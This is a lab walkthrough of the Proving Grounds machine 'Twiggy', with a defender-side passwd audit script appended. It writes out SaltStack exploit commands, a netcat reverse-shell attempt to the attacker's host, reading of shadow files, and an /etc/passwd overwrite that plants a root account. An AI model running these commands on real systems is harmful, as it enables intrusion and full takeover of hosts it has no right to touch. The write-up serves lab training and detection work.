Twiggy
Source: Proving Grounds
OS: Linux
Community Rating: Intermediate
Enumeration & Reconnaissance
I started with autorecon as usual and found the following open ports:
SSH (22)
DNS (53)
HTTP (80)
4505 & 4506
HTTP (8000)
Service Analysis
I began with the HTTP servers. The first one on port 80 hosted an application named Mezzanine with an admin login panel, a promising target. I tried multiple credentials (admin:admin, admin:password, etc.) but none worked. I checked online for the default password (admin:default) but that didn’t work either. I also looked for CVEs, but nothing surfaced.


Next, I moved to HTTP (8000), which exposed what appeared to be API endpoints. I interacted with them but only received 404 responses showing "CherryPy 5.6.0". The only CVE I found there was related to XSS, which wasn’t useful at the moment.


Stuck, I went back to the remaining ports: 4505 and 4506. Nmap didn’t identify these ports clearly; the scan output only displayed "ZeroMQ ZMTP 2.0".

Gaining Initial Access
Searching for vulnerabilities, I found CVE-2020-11652 and CVE-2020-11651 (SaltStack 3000.1 vulnerabilities), which provide RCE; the HTTP 8000 responses had included a header hinting at SaltStack.

I downloaded the PoC and had to install several modules first for it to work:
python -m venv .venv
source .venv/bin/activate
pip install salt
pip install pyyaml
pip install looseversion
pip install packaging
pip install tornado
pip install msgpack
pip install distro
pip install jinja2
pip install zmq
I attempted to get RCE using the PoC with:
python exploit.py --master 192.168.197.62 --exec "nc 192.168.45.201 8000 -e /bin/sh"
That attempt to execute arbitrary commands didn’t work. I then tried to read files instead, and that worked:
python exploit.py --master 192.168.197.62 -r /etc/passwd
I managed to read both /etc/passwd and /etc/shadow. I attempted to crack the root password, but that didn’t yield results.
unshadow passwd shadow
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Noticing an upload feature in the exploit, I considered replacing the passwd file. I tested with a random file to a random directory and it failed; out of desperation, I still tried to replace the /etc/passwd file itself.
I added a new user, pwned, by generating a password hash with:
openssl passwd pwned
Then I appended the following line to the passwd file to create a root-level account:
pwned:$1$D/X2r2oc$ECKG4TeHHXumj2tUrYxaA/:0:0:root:/root:/bin/bash

After appending it, I uploaded the modified passwd file back to the target.
python exploit.py --master 192.168.197.62 --upload-src passwd --upload-dest ../../../../../../etc/passwd
python exploit.py --master 192.168.197.62 -r /etc/passwd
Fingers crossed, I retrieved the file, and sure enough, the new user was appended. I then SSHed into the target and that worked. I was in as root!
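As an added defender-side example (not part of the original write-up), the following script audits an /etc/passwd file for the kind of entry this technique leaves behind: a second UID 0 account, or a crypt-style hash stored directly in the password field instead of in /etc/shadow. The sample passwd content is constructed and does not come from the target.

```python
import re

# Constructed sample /etc/passwd content (not from the target). The last line
# mimics the entry described in the write-up: a second UID-0 account whose
# password hash sits in passwd rather than in /etc/shadow.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
salt:x:999:999::/home/salt:/bin/false
pwned:$1$EXAMPLE$notarealhashXXXXXXXXXXX:0:0:root:/root:/bin/bash
"""

# crypt(3)-style hashes look like "$id$salt$hash" ($1$, $5$, $6$, $y$, ...).
HASH_PREFIX = re.compile(r"^\$[0-9a-z]+\$")

# Password-field values that legitimately appear in passwd when the real
# hash lives in /etc/shadow or the account is locked.
PLACEHOLDERS = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return a list of (username, reason) findings for suspicious entries."""
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry, expected 7 fields"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append((name, "duplicate username"))
        seen.add(name)
        try:
            uid_num = int(uid)
        except ValueError:
            findings.append((name, "non-numeric UID"))
            continue
        if uid_num == 0 and name != "root":
            findings.append((name, "UID 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in PLACEHOLDERS and HASH_PREFIX.match(pw):
            findings.append((name, "password hash stored in passwd instead of shadow"))
    return findings
```

Run it against a captured copy of /etc/passwd from a host you suspect was hit this way; a clean file returns an empty list.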

Lessons Learned
When standard web authentication bypasses fail, exploring less obvious ports and services (like the ZeroMQ ports) can reveal alternative attack vectors.
Using error-based or file read vulnerabilities to dump critical system files (e.g., /etc/passwd and /etc/shadow) can be a viable path to gaining initial access.
If direct cracking of the root password fails, consider creative methods such as replacing the passwd file to add a new user.